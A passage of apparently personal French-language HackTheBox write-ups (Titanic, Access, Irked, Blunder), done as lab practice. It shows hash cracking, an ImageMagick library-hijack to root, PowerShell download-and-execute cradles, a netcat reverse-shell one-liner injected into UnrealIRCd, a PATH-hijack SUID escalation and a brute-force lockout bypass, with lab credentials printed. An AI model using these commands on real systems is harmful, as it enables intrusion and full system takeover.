a|pbkdf2$50000$50|24fc79c6b2aadeb9555d40312ac55460|0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d b|pbkdf2$50000$50|47b1683e379bca325752efd85fe1c31b|097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce\nCe qui nous donne :\nsha256:50000:2d149e5fbd1b20cf31db3e3c6a28fc9b:cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136 sha256:50000:8bf3e3452b78544f8bee9400d6936d34:e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 sha256:50000:24fc79c6b2aadeb9555d40312ac55460:0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d sha256:50000:47b1683e379bca325752efd85fe1c31b:097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce\nEnfin, en format hashcat avec du base64:\nsha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY= sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= sha256:50000:JPx5xrKq3rlVXUAxKsVUYA==:CuOCVkEBZAZkOhIvfzymxrXPx2q9QAdfc+uN7/TM5USL+pXcWk/4HWLLd5Ic0iSyAQ0= sha256:50000:R7FoPjebyjJXUu/YX+HDGw==:CXw8DNv1C1NrIO9eIrbdjlj7+mIwAD9gpqFVdxB9SGGIFNpeHCmE43df2+o/YcQc0M4=\nOn trouve ensuite le mot de passe developer en utilisant hashcat :\n1 2 3 4 5 6 7 8 9 10 11 $ hashcat -m 10900 hash_final.txt.b64 ~/wordlists/rockyou.txt hashcat (v6.2.5) starting ... Dictionary cache hit: * Filename..: /home/leopold/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139922195 * Keyspace..: 14344385 sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528 developer : 25282528\nPrivilege Escalation Exploitation : Image Magick https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8\n1 2 3 4 5 6 7 8 9 10 11 developer@titanic:/opt/app/static/assets/images$ find / -writable -type d 2\u0026gt;/dev/null | head /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/dbus.socket /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/gpg-agent.service /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/dbus.service /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/init.scope /opt/app/static/assets/images /opt/app/tickets /home/developer /home/developer/.gnupg On trouve ces dossiers: /opt/app/static/assets/images /opt/app/tickets\nAvec ce script:\n1 2 3 4 developer@titanic:/opt/app/static/assets/images$ cat /opt/scripts/identify_images.sh cd /opt/app/static/assets/images truncate -s 0 metadata.log find /opt/app/static/assets/images/ -type f -name \u0026#34;*.jpg\u0026#34; | xargs /usr/bin/magick identify \u0026gt;\u0026gt; metadata.log On recherche une CVE pour magick, on trouve que notre version est vulnerable. On trouve le github, on suit les instructions. On construit une fausse librairie qui va executer du code en tant que root. il execute un shell.sh que j\u0026rsquo;ai defini et qui ouvre un revershell.\n1 2 3 4 5 6 7 8 9 10 gcc -x c -shared -fPIC -o ./libxcb.so.1 - \u0026lt;\u0026lt; EOF ##include \u0026lt;stdio.h\u0026gt; ##include \u0026lt;stdlib.h\u0026gt; ##include \u0026lt;unistd.h\u0026gt; __attribute__((constructor)) void init(){ system(\u0026#34;/opt/app/static/assets/images/shell.sh\u0026#34;); exit(0); } EOF 1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/htb/Titanic] └─$ nc -lnvp 6666 listening on [any] 6666 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.11.55] 51460 sh: 0: can\u0026#39;t access tty; job control turned off # whoami root # cat /root/root.txt c304.....3cde Tips ATTENTION !! Le piège : on ne trouve rien avec gobuster dns. A l\u0026rsquo;avenir, il faut prioriser ABSOLUMENT ffuf pour trouver les sous-domaines !! ","date":"2025-02-21T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/titanic-htb/","title":"HTB | Titanic"},{"content":" Machine name OS IP Difficulty Access Windows 10.10.10.98 Easy Users 1 security : 4Cc3ssC0ntr0ller Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ┌──(kali㉿kali)-[~/htb/Access] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.98 PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can\u0026#39;t get directory listing: TIMEOUT | ftp-syst: |_ SYST: Windows_NT 23/tcp open telnet syn-ack ttl 127 Microsoft Windows XP telnetd | telnet-ntlm-info: | Target_Name: ACCESS | NetBIOS_Domain_Name: ACCESS | NetBIOS_Computer_Name: ACCESS | DNS_Domain_Name: ACCESS | DNS_Computer_Name: ACCESS |_ Product_Version: 6.1.7600 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: MegaCorp Foothold FTP Anonymous connexion: Gettings 2 files 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ┌──(kali㉿kali)-[~/htb/Access/Access Control] └─$ ftp 10.10.10.98 Connected to 10.10.10.98. 220 Microsoft FTP Service Name (10.10.10.98:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp\u0026gt; dir 425 Cannot open data connection. 200 PORT command successful. 150 Opening ASCII mode data connection. 08-23-18 08:16PM \u0026lt;DIR\u0026gt; Backups 08-24-18 09:00PM \u0026lt;DIR\u0026gt; Engineer 226 Transfer complete. ftp\u0026gt; cd Backups 250 CWD command successful. ftp\u0026gt; dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-23-18 08:16PM 5652480 backup.mdb 226 Transfer complete. ftp\u0026gt; cd ../Engineer 250 CWD command successful. ftp\u0026gt; dir 200 PORT command successful. 150 Opening ASCII mode data connection. 08-24-18 12:16AM 10870 Access Control.zip 226 Transfer complete. ftp\u0026gt; ^D 221 Goodbye. backup.mdb and Access Control.zip En analysant les tables disponibles dans le fichier backup.mdb, on trouve la table \u0026ldquo;auth_user\u0026rdquo; qui contient un champs PASSWORD potentiellement intéressant.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 ┌──(kali㉿kali)-[~/htb/Access] └─$ mdb-schema backup.mdb | grep -i PASSWORD -A30 -B30 ... CREATE TABLE [auth_user] ( [id] Long Integer, [username] Text (50), [password] Text (50), [Status] Long Integer, [last_login] DateTime, [RoleID] Long Integer, [Remark] Memo/Hyperlink (255) ); ... On extrait la table auth_user et on récupère 3 credentials user/password.\n1 2 3 4 5 6 ┌──(kali㉿kali)-[~/htb/Access] └─$ mdb-export backup.mdb auth_user id,username,password,Status,last_login,RoleID,Remark 25,\u0026#34;admin\u0026#34;,\u0026#34;admin\u0026#34;,1,\u0026#34;08/23/18 21:11:47\u0026#34;,26, 27,\u0026#34;engineer\u0026#34;,\u0026#34;access4u@security\u0026#34;,1,\u0026#34;08/23/18 21:13:36\u0026#34;,26, 28,\u0026#34;backup_admin\u0026#34;,\u0026#34;admin\u0026#34;,1,\u0026#34;08/23/18 21:14:02\u0026#34;,26, En ftp et telnet, aucun ne fonctionne. Cependant, en utilisant le mot de passe \u0026ldquo;access4u@security\u0026rdquo; sur le fichier \u0026ldquo;Access Control.zip\u0026rdquo;, l\u0026rsquo;archive se décompresse correctement !\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ┌──(kali㉿kali)-[~/htb/Access] └─$ 7z x Access\\ Control.zip 7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29 64-bit locale=en_US.UTF-8 Threads:3 OPEN_MAX:1024 Scanning the drive for archives: 1 file, 10870 bytes (11 KiB) Extracting archive: Access Control.zip -- Path = Access Control.zip Type = zip Physical Size = 10870 Enter password (will not be echoed): \u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt; access4u@security Everything is Ok Size: 271360 Compressed: 10870 ┌──(kali㉿kali)-[~/htb/Access] └─$ ls \u0026#39;Access Control.pst\u0026#39; \u0026#39;Access Control.zip\u0026#39; auth_user.txt backup.mdb Extracting emails from pst file 1 2 3 4 5 ┌──(kali㉿kali)-[~/htb/Access] └─$ readpst -r Access\\ Control.pst Opening PST file and indexes... Processing Folder \u0026#34;Deleted Items\u0026#34; \u0026#34;Access Control\u0026#34; - 2 items done, 0 items skipped. Getting \u0026ldquo;security\u0026rdquo; account password from emails security: 4Cc3ssC0ntr0ller\n1 2 3 4 ┌──(kali㉿kali)-[~/htb/Access/Access Control] └─$ cat mbox | grep pass The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers. \u0026lt;/o:shapelayout\u0026gt;\u0026lt;/xml\u0026gt;\u0026lt;![endif]--\u0026gt;\u0026lt;/head\u0026gt;\u0026lt;body lang=EN-US link=\u0026#34;#0563C1\u0026#34; vlink=\u0026#34;#954F72\u0026#34;\u0026gt;\u0026lt;div class=WordSection1\u0026gt;\u0026lt;p class=MsoNormal\u0026gt;Hi there,\u0026lt;o:p\u0026gt;\u0026lt;/o:p\u0026gt;\u0026lt;/p\u0026gt;\u0026lt;p class=MsoNormal\u0026gt;\u0026lt;o:p\u0026gt;\u0026amp;nbsp;\u0026lt;/o:p\u0026gt;\u0026lt;/p\u0026gt;\u0026lt;p class=MsoNormal\u0026gt;The password for the \u0026amp;#8220;security\u0026amp;#8221; account has been changed to 4Cc3ssC0ntr0ller.\u0026amp;nbsp; Please ensure this is passed on to your engineers.\u0026lt;o:p\u0026gt;\u0026lt;/o:p\u0026gt;\u0026lt;/p\u0026gt;\u0026lt;p class=MsoNormal\u0026gt;\u0026lt;o:p\u0026gt;\u0026amp;nbsp;\u0026lt;/o:p\u0026gt;\u0026lt;/p\u0026gt;\u0026lt;p class=MsoNormal\u0026gt;Regards,\u0026lt;o:p\u0026gt;\u0026lt;/o:p\u0026gt;\u0026lt;/p\u0026gt;\u0026lt;p class=MsoNormal\u0026gt;John\u0026lt;o:p\u0026gt;\u0026lt;/o:p\u0026gt;\u0026lt;/p\u0026gt;\u0026lt;/div\u0026gt;\u0026lt;/body\u0026gt;\u0026lt;/html\u0026gt; TELNET - security account 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ┌──(kali㉿kali)-[~/htb/Access/Access Control] └─$ telnet 10.10.10.98 23 Trying 10.10.10.98... Connected to 10.10.10.98. Escape character is \u0026#39;^]\u0026#39;. Welcome to Microsoft Telnet Service login: security password: 4Cc3ssC0ntr0ller *=============================================================== Microsoft Telnet Server. *=============================================================== C:\\Users\\security\u0026gt;type Desktop\\user.txt 9535.....3f75 Privilege Escalation Powershell Si j\u0026rsquo;écris simplement \u0026ldquo;powershell\u0026rdquo;, un powershell semble s\u0026rsquo;ouvrir mais n\u0026rsquo;est pas stable. J\u0026rsquo;ai donc dû ouvrir un reverse shell pour obtenir un powershell stable :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ----------KALI------------ ┌──(kali㉿kali)-[~/htb/Access] └─$ python3 -m http.server 8888 Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ... 10.10.10.98 - - [16/Feb/2025 17:04:22] \u0026#34;GET /Invoke.ps1 HTTP/1.1\u0026#34; 200 - ----------KALI------------ ┌──(kali㉿kali)-[~/htb/Access] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.16.9] from (UNKNOWN) [10.10.10.98] 49165 Windows PowerShell running as user security on ACCESS Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\\Users\\security\u0026gt;PS C:\\Users\\security\u0026gt; whoami access\\security ---------WINDOWS---------- C:\\Users\\security\u0026gt;powershell /C IEX(New-Object Net.WebClient).downloadString(\u0026#39;http://10.10.16.9:8888/Invoke.ps1\u0026#39;) ZKAccess.lnk 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 PS C:\\Users\\security\u0026gt; cd ../Public PS C:\\Users\\Public\u0026gt; cd Desktop PS C:\\Users\\Public\\Desktop\u0026gt; ls Directory: C:\\Users\\Public\\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 8/22/2018 10:18 PM 1870 ZKAccess3.5 Security System.lnk PS C:\\Users\\Public\\Desktop\u0026gt; cat Z* L?F?@ ??7???7???#?P/P?O? ?:i?+00?/C:\\R1M?:Windows???:?▒M?:*wWindowsV1MV?System32???:?▒MV?*?System32▒X2P?:? runas.exe???:1??:1?*Yrunas.exe▒L-K??E?C:\\Windows\\System32\\runas.exe#..\\..\\..\\Windows\\System32\\runas.exeC:\\ZKTeco\\ZKAccess3.5G/user:ACCESS\\Administrator /savecred \u0026#34;C:\\ZKTeco\\ZKAccess3.5\\Access.exe\u0026#34;\u0026#39;C:\\ZKTeco\\ZKAccess3.5\\img\\AccessNET.ico?%SystemDrive%\\ZKTeco\\ZKAccess3.5\\img\\AccessNET.ico%SystemDrive%\\ZKTeco\\ZKAccess3.5\\img\\AccessNET.ico?%? ?wN?▒?]N?D.??Q???`?Xaccess?_???8{E?3 O?j)?H??? )??[?_???8{E?3 O?j)?H??? )??[? ??1SPS??XF?L8C???\u0026amp;?m?e*S-1-5-21-953262931-566350628-63446256-500 En fouillant dans les dossiers, on trouve un fichier ZKAccess.lnk qui semble executer un binaire \u0026ldquo;Access.exe\u0026rdquo; avec des droits élévé :\nWindows\\System32\\runas.exeC:\\ZKTeco\\ZKAccess3.5G/user:ACCESS\\Administrator /savecred \u0026ldquo;C:\\ZKTeco\\ZKAccess3.5\\Access.exe On observe l\u0026rsquo;utilisation de runas, pour executer un fichier en tant qu\u0026rsquo;un utilisateur spécifique. En l\u0026rsquo;occurence, ici, il s\u0026rsquo;agit de l\u0026rsquo;Administrator (celui qui nous intéresse). Apparement les creds de l\u0026rsquo;administrateur sont enregistrés, et on peut executer n\u0026rsquo;importe quelle commande en tant qu\u0026rsquo;Administrator en utilisant l\u0026rsquo;argument /savecred.\nOn tente d\u0026rsquo;utiliser à nouveau notre script Invoke.ps1 pour ouvrir un reverseshell de type powershell en tant qu\u0026rsquo;Administrator, et ça fonctionne. On a changé le port dans le Invoke.ps1 bien sûr car le port est déjà utiliser sur la kali pour le powershell actuel.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 PS C:\\Users\\security\u0026gt; runas /user:ACCESS\\Administrator /savecred \u0026#34;powershell /C IEX(New-Object Net.WebClient).downloadString(\u0026#39;http://10.10.16.9:8888/Invoke.ps1\u0026#39;)\u0026#34; --------KALI--------- ┌──(kali㉿kali)-[~/htb/Access] └─$ nc -lnvp 1339 listening on [any] 1339 ... connect to [10.10.16.9] from (UNKNOWN) [10.10.10.98] 49216 Windows PowerShell running as user Administrator on ACCESS Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\\Windows\\system32\u0026gt;whoami access\\administrator PS C:\\Windows\\system32\u0026gt; cd C:\\Users\\Administrator PS C:\\Users\\Administrator\u0026gt; cd Desktop PS C:\\Users\\Administrator\\Desktop\u0026gt; ls Directory: C:\\Users\\Administrator\\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar-- 2/16/2025 6:02 PM 34 root.txt PS C:\\Users\\Administrator\\Desktop\u0026gt; cat root.txt 339f.....e901 Tips Toujours fouiller les dossiers des utilisateurs accessibles, avant d\u0026rsquo;effectuer un winPEAS. ","date":"2025-02-18T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/access-htb/","title":"HTB | Access"},{"content":" Machine name OS IP Difficulty Irked Linux 10.10.10.117 Easy System info 1 2 3 4 5 6 7 8 ircd@irked:/home/djmardov/Documents$ uname -a Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux ircd@irked:/home/djmardov/Documents$ lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 8.10 (jessie) Release: 8.10 Codename: jessie Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.117 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAI+wKAAyWgx/P7Pe78y6/80XVTd6QEv6t5ZIpdzKvS8qbkChLB7LC+/HVuxLshOUtac4oHr/IF9YBytBoaAte87fxF45o3HS9MflMA4511KTeNwc5QuhdHzqXX9ne0ypBAgFKECBUJqJ23Lp2S9KuYEYLzUhSdUEYqiZlcc65NspAAAAFQDwgf5Wh8QRu3zSvOIXTk+5g0eTKQAAAIBQuTzKnX3nNfflt++gnjAJ/dIRXW/KMPTNOSo730gLxMWVeId3geXDkiNCD/zo5XgMIQAWDXS+0t0hlsH1BfrDzeEbGSgYNpXoz42RSHKtx7pYLG/hbUr4836olHrxLkjXCFuYFo9fCDs2/QsAeuhCPgEDjLXItW9ibfFqLxyP2QAAAIAE5MCdrGmT8huPIxPI+bQWeQyKQI/lH32FDZb4xJBPrrqlk9wKWOa1fU2JZM0nrOkdnCPIjLeq9+Db5WyZU2u3rdU8aWLZy8zF9mXZxuW/T3yXAV5whYa4QwqaVaiEzjcgRouex0ev/u+y5vlIf4/SfAsiFQPzYKomDiBtByS9XA== | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8= | 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj 80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn\u0026#39;t have a title (text/html). | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST 111/tcp open rpcbind syn-ack 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 34862/tcp status | 100024 1 41825/tcp6 status | 100024 1 46351/udp status |_ 100024 1 49135/udp6 status 6697/tcp open irc syn-ack UnrealIRCd 8067/tcp open irc syn-ack UnrealIRCd 34862/tcp open status syn-ack 1 (RPC #100024) 65534/tcp open irc syn-ack UnrealIRCd Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Foothold Exploit: UnrealIRCd 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 ┌──(kali㉿kali)-[~] └─$ nc -nv 10.10.10.117 6697 (UNKNOWN) [10.10.10.117] 6697 (ircs-u) open :irked.htb NOTICE AUTH :*** Looking up your hostname... AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.27 1337 \u0026gt;/tmp/f :irked.htb NOTICE AUTH :*** Couldn\u0026#39;t resolve your hostname; using your IP address instead ------------------------------------------ ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.16.19] from (UNKNOWN) [10.10.10.117] 53736 bash: cannot set terminal process group (625): Inappropriate ioctl for device bash: no job control in this shell ircd@irked:~/Unreal3.2$ whoami whoami pwdircd ircd@irked:~/Unreal3.2$ pwd /home/ircd/Unreal3.2 ircd@irked:~/Unreal3.2$ python3 -V python3 -V Python 3.4.2 ircd@irked:~/Unreal3.2$ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; ircd@irked:~/Unreal3.2$ export TERM=xterm export TERM=xterm ircd@irked:~/Unreal3.2$ ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1337 ircd@irked:~/Unreal3.2$ ircd@irked:~/Unreal3.2$ whoami ircd ircd -\u0026gt; djmardov .backup - password On trouve un fichier .backup dans les documents du user djmardov, avec un mot de passe :\n1 2 3 ircd@irked:/home/djmardov/Documents$ cat .backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss steg hide On trouve le mot \u0026ldquo;steg\u0026rdquo; et \u0026ldquo;pw\u0026rdquo; dans le fichier .backup. On suppose qu\u0026rsquo;il faut faire la stegano sur une image. La seule image disponible sur le serveur est celle du site web, dans /var/www/html/irked.jpg. On utilise l\u0026rsquo;outil steg hide pour extraire une string de l\u0026rsquo;image en utilsant le mot de passe fournit, et ça fonctionne, on recupere le mot de passe de djmardov:\n1 2 3 4 5 6 7 ┌──(kali㉿kali)-[~/htb/Irked] └─$ steghide extract -p UPupDOWNdownLRlrBAbaSSss -sf ./irked.jpg wrote extracted data to \u0026#34;pass.txt\u0026#34;. ┌──(kali㉿kali)-[~/htb/Irked] └─$ cat pass.txt Kab6h+m+bbp2J:HG SSH djmardov - user flag 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ┌──(kali㉿kali)-[~/htb/Irked] └─$ ssh djmardov@irked.htb The authenticity of host \u0026#39;irked.htb (10.10.10.117)\u0026#39; can\u0026#39;t be established. ED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yzqs Please type \u0026#39;yes\u0026#39;, \u0026#39;no\u0026#39; or the fingerprint: yes Warning: Permanently added \u0026#39;irked.htb\u0026#39; (ED25519) to the list of known hosts. Kab6h+m+bbp2J:HG djmardov@irked.htb\u0026#39;s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue May 15 08:56:32 2018 from 10.33.3.3 djmardov@irked:~$ whoami djmardov djmardov@irked:~$ ls Desktop Documents Downloads Music Pictures Public Templates user.txt Videos djmardov@irked:~$ cat user.txt 0d95.....9a07 Privilege Escalation SUID binary: viewuser Après avoir executé linpeas, on observe un SUID binary suspect : /usr/bin/viewuser. Et oui, fallait remarquer ça\u0026hellip; En regardant de plus près, on remarque qu\u0026rsquo;il existe la commande \u0026ldquo;who\u0026rdquo; sans utiliser de chemin absolu. On ajoute donc au PATH le dossier /tmp puis on crée un fichier avec une commande pour mettre le bit SUID sur /bin/bash et pour executer bash -p en tant que root directement. On aurait pu mettre potentiellement /bin/bash directement dans who egalement.\nDans les write up, on remarque plutot l\u0026rsquo;utilisation du fichier /tmp/listusers avec un /bin/bash dedans, tout simplemment ! car on a un setuid(0); system(\u0026rsquo;/tmp/listusers\u0026rsquo;) dans le binaire. On remarque qu\u0026rsquo;il n\u0026rsquo;y a pas de setuid(0) avant le system(\u0026lsquo;who\u0026rsquo;)\u0026hellip; Donc je ne vois pas comment mon exploit fonctionne, pourtant ça fonctionne bien !\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 bash-4.3# echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games bash-4.3# export PATH=/tmp:$PATH bash-4.3# echo $PATH /tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games ------------------------ nano /tmp/who ----\u0026gt; chmod +s /bin/bash ------------------------------- djmardov@irked:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed sh: 1: /tmp/listusers: Permission denied djmardov@irked:~$ bash -p bash-4.3# whoami root bash-4.3# cat /root/root.txt 259a.....a166 ","date":"2025-02-16T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/irked-htb/","title":"HTB | Irked"},{"content":" Machine name OS IP Difficulty Blunder Linux 10.10.10.191 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 $ nmap -sC -sV -An -T4 -vvv 10.10.10.191 PORT STATE SERVICE REASON VERSION 21/tcp closed ftp conn-refused 80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts |_http-generator: Blunder | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA Foothold Webserver : todo.txt Sur le port 80, on trouve un serveur web. A la racine se trouve un fichier todo.txt avec des informations intéressantes.\n1 2 3 4 -Update the CMS -Turn off FTP - DONE -Remove old users - DONE -Inform fergus that the new blog needs images - PENDING Bruteforce admin login page On peut bruteforce la page admin avec l\u0026rsquo;utilisateur potentiel \u0026ldquo;fergus\u0026rdquo; qu\u0026rsquo;on a trouvé dans le todo.txt. Il y a une protection contre le bruteforce qui blacklist notre IP. Mais on peut changer le parametre \u0026ldquo;X_FORWADED_FOR: 127.0.0.1\u0026rdquo; avec une autre ip aléatoire et à nouveau effectuer de nouvelles tentatives d\u0026rsquo;authentification. Quelqu\u0026rsquo;un a déjà créer un script sur github en ruby pour effectuer cette attaque bruteforce facilement. On le trouve en utilisant searchsploit mais egalement sur internet: https://github.com/noraj/Bludit-auth-BF-bypass\nPour la liste de mot de passe, le mot de passe ne semble pas etre dans la lite rockyou. Le reflexe est donc de créer une liste grâce à cewl et tous les mots présents sur la page d\u0026rsquo;accueil :\n1 cewl http://10.10.10.191 \u0026gt; pass.txt On peut maintenant effectuer notre attaque bruteforce avec notre script, l\u0026rsquo;utilisateur fergus ainsi que la liste de mot de passe basé sur les mots présents sur la page d\u0026rsquo;accueil du site web :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ┌──(kali㉿kali)-[~/htb/Blunder] └─$ ruby exploit.rb -r http://10.10.10.191 -u fergus -w ./pass.txt [*] Trying password: CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/) [*] Trying password: the ... ... [*] Trying password: book [*] Trying password: collections [*] Trying password: Bram [*] Trying password: Stoker [*] Trying password: British [*] Trying password: Society [*] Trying password: Book [*] Trying password: Foundation [*] Trying password: him [*] Trying password: Distinguished [*] Trying password: Contribution [*] Trying password: Letters [*] Trying password: probably [*] Trying password: best [*] Trying password: fictional [*] Trying password: character [*] Trying password: RolandDeschain [+] Password found: RolandDeschain On trouve les creds suivants : fergus:RolandDeschain\nDirectory Traversal On trouve une exploit sur searchsploit permettant d\u0026rsquo;uploader une image png contenant du code php. Ici on générere avec msfvenom un reverseshell qu\u0026rsquo;on va uploader en tant qu\u0026rsquo;image png. Puis, on va pouvoir y accéder et executer le code en se rendant sur l\u0026rsquo;url: /bl-content/tmp/temp/evil.png\n1 2 3 4 5 6 